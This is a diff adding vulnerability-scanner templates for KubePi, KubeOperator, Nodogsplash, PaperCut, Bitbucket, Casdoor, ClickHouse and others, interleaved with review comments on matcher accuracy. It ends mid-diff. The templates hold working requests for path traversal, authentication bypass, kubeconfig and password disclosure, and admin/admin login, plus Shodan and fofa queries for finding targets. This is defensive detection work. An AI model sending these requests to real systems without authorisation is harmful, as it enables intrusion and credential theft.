cvss-score: 7.5 + cve-id: CVE-2023-22478 + cwe-id: CWE-862 + metadata: + max-request: 1 + fofa-query: "kubepi" + shodan-query: html:"kubepi" + verified: true + tags: cve,cve2023,kubepi,k8s,exposure + +http: + - raw: + - | + @timeout 10 + POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {} + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"apiVersion":' + - '"uuid":' + - '"userName":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml new file mode 100644 index 0000000000..08aceb7382 --- /dev/null 
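Review bot: In CVE-2023-22478, `name: KubePi <= v1.6.4 …` contradicts the description, which says the issue "has been patched in version 1.6.4"; as written a 1.6.4 install is labelled both fixed and affected. If the description is right the name should read `KubePi < v1.6.4 LoginLogsSearch - Unauthorized Access`. The request line also has a doubled separator, `pageNum=1&&pageSize=10`, which most parsers tolerate but is worth cleaning to `pageNum=1&pageSize=10`.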
+++ b/http/cves/2023/CVE-2023-22480.yaml @@ -0,0 +1,46 @@ +id: CVE-2023-22480 + +info: + name: KubeOperator Foreground `kubeconfig` - File Download + author: DhiyaneshDk + severity: critical + description: | + KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4. + reference: + - https://github.com/KubeOperator/KubeOperator/security/advisories/GHSA-jxgp-jgh3-8jc8 + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubeOperator/KubeOperator%20kubeconfig%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22480.md?plain=1 + - https://nvd.nist.gov/vuln/detail/CVE-2023-22480 + classification: + cve-id: CVE-2023-22480 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-863 + metadata: + max-request: 1 + verified: true + shodan-query: html:"KubeOperator" + fofa-query: app="KubeOperator" + tags: cve,cve2023,kubeoperator,k8s,kubeconfig,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/api/v1/clusters/kubeconfig/k8s" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "apiVersion:" + - "clusters:" + condition: and + + - type: word + part: header + words: + - "application/download" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-39120.yaml b/http/cves/2023/CVE-2023-39120.yaml new file mode 100644 index 0000000000..d3e5e67844 --- /dev/null +++ b/http/cves/2023/CVE-2023-39120.yaml 
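Review bot: The request path ends in a fixed segment, `/api/v1/clusters/kubeconfig/k8s`, which reads like a cluster name rather than part of the API route. If so, the template only fires when a cluster happens to be called `k8s`, and a clean result on an affected KubeOperator (3.16.3 and below, per the description) proves nothing. State that limit in `description`, and add a `remediation:` line naming 3.16.4 so operators patch on version rather than on scan result.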
@@ -0,0 +1,47 @@ +id: CVE-2023-39120 + +info: + name: Nodogsplash - Directory Traversal + author: Numan Türle + severity: high + description: | + Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-39120 + - https://github.com/nodogsplash/nodogsplash/commit/a745a5d635925d2a6f0e0530bdc0eac645b672ed + - https://gist.github.com/numanturle/55cb758bacc4930a081e79c2a6a769b6 + - https://github.com/openwrt/routing/pull/997 + remediation: Apply all relevant security patches and product upgrades. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-39120 + cwe-id: CWE-22 + metadata: + verified: true + max-request: 1 + shodan-query: title:"OpenWRT" + tags: cve,cve2023,lfi,openwrt,nodogsplash + +http: + - method: GET + path: + - "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "nodogsplash" + - "password" + condition: and + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml new file mode 100644 index 0000000000..4237c2a6c2 --- /dev/null +++ b/http/cves/2023/CVE-2023-39143.yaml 
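Review bot: `remediation: Apply all relevant security patches and product upgrades.` is boilerplate even though the description already names the fixed release. Replace it with `remediation: Upgrade Nodogsplash to 5.0.1 or later.` so the finding is actionable on its own. The body matcher requires both `nodogsplash` and `password`; a config file without a password option would be read successfully yet not reported, which deserves a comment next to the matcher.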
@@ -0,0 +1,36 @@ +id: CVE-2023-39143 + +info: + name: PaperCut < 22.1.3 - Path Traversal + author: pdteam + severity: critical + description: PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-39143 + - https://www.horizon3.ai/cve-2023-39143-papercut-path-traversal-file-upload-rce-vulnerability/ + - https://www.papercut.com/kb/Main/securitybulletinjuly2023/ + - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H + cve-id: CVE-2023-39143 + cvss-score: 9.4 + epss-score: 0.00043 + metadata: + max-request: 1 + verified: true + shodan-query: html:"content="PaperCut"" + tags: cve,cve2023,lfi,papercut,kev + +http: + - method: GET + path: + - "{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png" + + matchers: + - type: dsl + dsl: + - content_length == 1655 + - status_code == 200 + - contains(to_lower(content_type), "image/png") + - contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex + condition: and diff --git a/http/default-logins/bloofoxcms-default-login.yaml b/http/default-logins/bloofoxcms-default-login.yaml new file mode 100644 index 0000000000..41bf0fe859 --- /dev/null +++ b/http/default-logins/bloofoxcms-default-login.yaml 
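Review bot: `content_length == 1655` pins the match to the exact byte size of `home-app.png` in whatever build was tested. If another affected release ships a different icon, the file is still served and the template stays silent. The PNG-signature and `image/png` terms already show the file came back, so I would drop the length term or add a comment stating which versions it was measured on. `classification` also has no `cwe-id`, unlike the other path-traversal templates in this commit (`CWE-22`).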
@@ -0,0 +1,45 @@ +id: bloofoxcms-default-login + +info: + name: bloofoxCMS - Default Login + author: theamanrawat + severity: high + description: | + bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://www.bloofox.com/automated_setup.113.html + - https://www.bloofox.com + metadata: + verified: "true" + fofa-query: "Powered by bloofoxCMS" + max-request: 1 + tags: bloofox,cms,default-login + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + attack: pitchfork + payloads: + username: + - "admin" + password: + - "admin" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'text/html' + - 'index.php' + condition: and + + - type: status + status: + - 302 diff --git a/http/exposed-panels/acenet-panel.yaml b/http/exposed-panels/acenet-panel.yaml new file mode 100644 index 0000000000..01deccb2ef --- /dev/null +++ b/http/exposed-panels/acenet-panel.yaml @@ -0,0 +1,28 @@ +id: acenet-panel + +info: + name: AceNet AceReporter Report Panel - Detect + author: DhiyaneshDk + severity: info + metadata: + max-request: 1 + fofa-query: body="Login @ Reporter" + shodan-query: http.favicon.hash:-1595726841 + tags: panel,login,acenet,acereporter + +http: + - method: GET + path: + - "{{BaseURL}}/index.php" + + matchers-condition: and + matchers: + - type: word + words: + - 'Welcome to Reporter' + - 'Login @ Reporter' + condition: and + + - type: status + status: + - 200 diff --git a/http/exposed-panels/bloofoxcms-login-panel.yaml b/http/exposed-panels/bloofoxcms-login-panel.yaml new file mode 100644 index 0000000000..9661c30661 --- /dev/null +++ b/http/exposed-panels/bloofoxcms-login-panel.yaml 
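Review bot: In `bloofoxcms-default-login` the success test is only a 302 whose headers contain `text/html` and `index.php`; nothing in it distinguishes an accepted login from a redirect the application might also send on a rejected one, and the hunk gives no evidence either way. A matcher on a post-login marker, such as a session cookie or a string that only appears once authenticated, would make a hit trustworthy. `verified: "true"` is a quoted string here, while the other templates use the boolean `verified: true`.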
@@ -0,0 +1,36 @@ +id: bloofoxcms-login-panel + +info: + name: bloofoxCMS Login Panel - Detect + author: theamanrawat + severity: info + metadata: + verified: "true" + fofa-query: "Powered by bloofoxCMS" + max-request: 2 + tags: panel,bloofox,cms + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/admin/index.php" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bloofoxCMS - Home" + - "E-Mail / Username" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/exposed-panels/discuz-panel.yaml b/http/exposed-panels/discuz-panel.yaml new file mode 100644 index 0000000000..a8fe16d47f --- /dev/null +++ b/http/exposed-panels/discuz-panel.yaml @@ -0,0 +1,36 @@ +id: discuz-panel + +info: + name: Discuz Panel - Detection + author: ritikchaddha + severity: info + metadata: + max-request: 1 + verified: true + shodan-query: title:"Discuz!" + fofa-query: title="Discuz!" + tags: panel,discuz,detect,login + +http: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'discuz_uid =' + - 'discuz' + - 'Powered by Discuz!' + - 'content="Discuz' + condition: or + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'X([0-9.]+)<\/em><\/p>' diff --git a/http/exposed-panels/kodak-network-panel.yaml b/http/exposed-panels/kodak-network-panel.yaml new file mode 100644 index 0000000000..3a31855628 --- /dev/null +++ b/http/exposed-panels/kodak-network-panel.yaml 
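Review bot: In `discuz-panel` the single body matcher uses `condition: or` over four words, one of which is the bare lower-case `discuz`, so any page that merely mentions the word is reported as a Discuz panel. There is also no status matcher, although `matchers-condition: and` is set. Drop the bare `- 'discuz'` entry and keep `discuz_uid =`, `Powered by Discuz!` and `content="Discuz`. The extractor regex as rendered begins at `X(` with no surrounding tag, which may be markup lost on this page and is worth checking in the file.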
@@ -0,0 +1,26 @@ +id: kedacom-network-panel + +info: + name: Kedacom Network Keyboard Console Panel - Detect + author: DhiyaneshDk + severity: info + metadata: + max-request: 1 + fofa-query: "网络键盘控制台" + verified: true + tags: panel,login,kedacom,network + +http: + - method: GET + path: + - "{{BaseURL}}/login.html" + + matchers-condition: and + matchers: + - type: word + words: + - '网络键盘控制台' + + - type: status + status: + - 200 diff --git a/http/exposed-panels/mpsec-isg1000-panel.yaml b/http/exposed-panels/mpsec-isg1000-panel.yaml new file mode 100644 index 0000000000..d99769ae20 --- /dev/null +++ b/http/exposed-panels/mpsec-isg1000-panel.yaml @@ -0,0 +1,26 @@ +id: mpsec-isg1000-panel + +info: + name: MPSec ISG1000 Security Gateway Panel - Detect + author: DhiyaneshDk + severity: info + metadata: + max-request: 1 + fofa-query: "迈普通信技术股份有限公司" + verified: true + tags: panel,login,mpsec,isg1000 + +http: + - method: GET + path: + - "{{BaseURL}}/login.html" + + matchers-condition: and + matchers: + - type: word + words: + - '/webui/images/maipu/login/' + + - type: status + status: + - 200 diff --git a/http/exposures/files/socks5-vpn-config.yaml b/http/exposures/files/socks5-vpn-config.yaml new file mode 100644 index 0000000000..92ad14ce27 --- /dev/null +++ b/http/exposures/files/socks5-vpn-config.yaml 
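Review bot: The first template in this line is added as `http/exposed-panels/kodak-network-panel.yaml`, but its `id` is `kedacom-network-panel` and the name and tags all say Kedacom, so the filename looks like a slip. Rename the file to `kedacom-network-panel.yaml` so id-based and path-based template selection agree and nobody goes looking for a Kodak device. The word matcher sets no `part`, and the template has no `description`; one sentence saying what the console is would help triage.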
@@ -0,0 +1,40 @@ +id: socks5-vpn-config + +info: + name: Socks5 VPN - Sensitive File Disclosure + author: DhiyaneshDk + severity: high + description: | + Information Leakage in the Socks5 VPN login system of Wheilton e-Ditong, and the administrator account password can be obtained by visiting a specially crafted URL. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E6%83%A0%E5%B0%94%E9%A1%BF%20e%E5%9C%B0%E9%80%9A%20config.xml%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E6%83%A0%E5%B0%94%E9%A1%BF/%E6%83%A0%E5%B0%94%E9%A1%BF%20e%E5%9C%B0%E9%80%9A%20config.xml%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1 + metadata: + max-request: 1 + verified: true + fofa-query: app="惠尔顿-e地通VPN" + tags: esocks5,exposure,misconfig,files,disclosure + +http: + - method: GET + path: + - "{{BaseURL}}/backup/config.xml" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "password=" + - "username=" + condition: and + + - type: word + part: header + words: + - "application/xml" + + - type: status + status: + - 200 diff --git a/http/misconfiguration/bitbucket-auth-bypass.yaml b/http/misconfiguration/bitbucket-auth-bypass.yaml new file mode 100644 index 0000000000..e0469709f5 --- /dev/null +++ b/http/misconfiguration/bitbucket-auth-bypass.yaml 
@@ -0,0 +1,34 @@ +id: bitbucket-auth-bypass + +info: + name: Bitbucket Server > 4.8 - Authentication Bypass + author: DhiyaneshDk + severity: critical + description: | + There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + verified: true + fofa-query: title="Log in - Bitbucket" + shodan-query: title:"Log in - Bitbucket" + tags: misconfig,atlassian,bitbucket,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/admin%20/db" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

Database

" + - "Migrate database" + condition: and + + - type: status + status: + - 200 diff --git a/http/misconfiguration/casdoor-users-password.yaml b/http/misconfiguration/casdoor-users-password.yaml new file mode 100644 index 0000000000..853ee41f87 --- /dev/null +++ b/http/misconfiguration/casdoor-users-password.yaml @@ -0,0 +1,37 @@ +id: casdoor-users-password + +info: + name: Casdoor get-users Account Password Disclosure + author: DhiyaneshDk + severity: high + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Casbin%20get-users%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1 + - https://github.com/qingchenhh/qc_poc/blob/main/Goby/Casbin_get_users.go + metadata: + max-request: 1 + verified: true + fofa-query: title="Casdoor" + tags: casdoor,exposure,misconfig,disclosure + +http: + - method: GET + path: + - "{{BaseURL}}/api/get-users?p=123&pageSize=123" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"name":' + - '"password":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 diff --git a/http/misconfiguration/clickhouse-unauth-api.yaml b/http/misconfiguration/clickhouse-unauth-api.yaml new file mode 100644 index 0000000000..a50cbcfda3 --- /dev/null +++ b/http/misconfiguration/clickhouse-unauth-api.yaml 
@@ -0,0 +1,38 @@ +id: clickhouse-unauth-api + +info: + name: ClickHouse API Database Interface - Improper Authorization + author: DhiyaneshDk + severity: high + reference: + - https://github.com/luck-ying/Library-POC/blob/master/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93%208123%E7%AB%AF%E5%8F%A3%E7%9A%84%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.py + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/redteam/vulnerability/unauthorized/ClickHouse%208123%E7%AB%AF%E5%8F%A3.md?plain=1 + metadata: + max-request: 1 + verified: true + shodan-query: "X-ClickHouse-Summary" + fofa-query: "X-ClickHouse-Summary" + tags: clickhouse,unauth,disclosure + +http: + - method: GET + path: + - "{{BaseURL}}/?query=SHOW%20DATABASES" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'default' + - 'system' + condition: and + + - type: word + part: header + words: + - 'text/tab-separated-values' + + - type: status + status: + - 200 diff --git a/http/misconfiguration/installer/yzmcms-installer.yaml b/http/misconfiguration/installer/yzmcms-installer.yaml new file mode 100644 index 0000000000..7652815bd2 --- /dev/null +++ b/http/misconfiguration/installer/yzmcms-installer.yaml @@ -0,0 +1,37 @@ +id: yzmcms-installer + +info: + name: YzmCMS - Installer + author: ritikchaddha + severity: high + metadata: + max-request: 1 + verified: true + shodan-query: title:"YzmCMS" + fofa-query: title="YzmCMS" + tags: misconfig,yzmcms,install,exposure + +http: + - method: GET + path: + - '{{BaseURL}}/application/install/index.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '安装程序 - YzmCMS' + - 'YzmCMS' + condition: or + + - type: word + part: body + words: + - '/index.php?step=2' + - '/install.css' + condition: or + + - type: status + status: + - 200 
diff --git a/http/misconfiguration/sonarqube-projects-disclosure.yaml b/http/misconfiguration/sonarqube-projects-disclosure.yaml new file mode 100644 index 0000000000..5289281ade --- /dev/null +++ b/http/misconfiguration/sonarqube-projects-disclosure.yaml @@ -0,0 +1,40 @@ +id: sonarqube-projects-disclosure + +info: + name: SonarQube - Information Disclosure + author: DhiyaneshDk + severity: medium + description: | + Information leakage vulnerability in an interface of SonarQube, you can download the source code through the tool. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/SonarQube/SonarQube%20search_projects%20%E9%A1%B9%E7%9B%AE%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md + - https://github.com/deletescape/sloot + metadata: + max-request: 1 + verified: true + shodan-query: title:"Sonarqube" + fofa-query: app="sonarQube-代码管理" + tags: sonarqube,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/api/components/search_projects" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"visibility":"public"' + - '{"organization' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 diff --git a/http/technologies/puppetdb-detect.yaml b/http/technologies/puppetdb-detect.yaml index 260f0187c8..99ade48498 100644 --- a/http/technologies/puppetdb-detect.yaml +++ b/http/technologies/puppetdb-detect.yaml @@ -26,10 +26,10 @@ http: words: - 'application/json' - - type: word + - type: regex part: body - words: - - '"version"' + regex: + - '"version"\s:\s"([0-9.]+)"' extractors: - type: regex diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml 
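Review bot: In `puppetdb-detect.yaml` the new regex `'"version"\s:\s"([0-9.]+)"'` demands exactly one whitespace character on each side of the colon. A compact response such as `"version":"x.y.z"` or `"version": "x.y.z"` therefore no longer matches, whereas the removed word matcher accepted any spacing. Unless every supported PuppetDB release prints the field this way, loosen it to `'"version"\s*:\s*"([0-9.]+)"'`. The enclosing matcher list starts outside the hunk.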
@@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 
--- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml 
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/all-in-one-wp-migration/
 metadata:
+ max-request: 1
 plugin_namespace: all-in-one-wp-migration
 wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
 metadata:
+ max-request: 1
 plugin_namespace: all-in-one-wp-security-and-firewall
 wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/amp/
 metadata:
+ max-request: 1
 plugin_namespace: amp
 wpscan: https://wpscan.com/plugin/amp
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/antispam-bee/
 metadata:
+ max-request: 1
 plugin_namespace: antispam-bee
 wpscan: https://wpscan.com/plugin/antispam-bee
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/astra-sites/
 metadata:
+ max-request: 1
 plugin_namespace: astra-sites
 wpscan: https://wpscan.com/plugin/astra-sites
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/astra-widgets/
 metadata:
+ max-request: 1
 plugin_namespace: astra-widgets
 wpscan: https://wpscan.com/plugin/astra-widgets
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/autoptimize/
 metadata:
+ max-request: 1
 plugin_namespace: autoptimize
 wpscan: https://wpscan.com/plugin/autoptimize
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/backwpup/
 metadata:
+ max-request: 1
 plugin_namespace: backwpup
 wpscan: https://wpscan.com/plugin/backwpup
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/better-search-replace/
 metadata:
+ max-request: 1
 plugin_namespace: better-search-replace
 wpscan: https://wpscan.com/plugin/better-search-replace
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/better-wp-security/
 metadata:
+ max-request: 1
 plugin_namespace: better-wp-security
 wpscan: https://wpscan.com/plugin/better-wp-security
 tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
 reference:
 - https://wordpress.org/plugins/black-studio-tinymce-widget/
 metadata:
+ max-request: 1
 plugin_namespace: black-studio-tinymce-widget
 wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
 tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
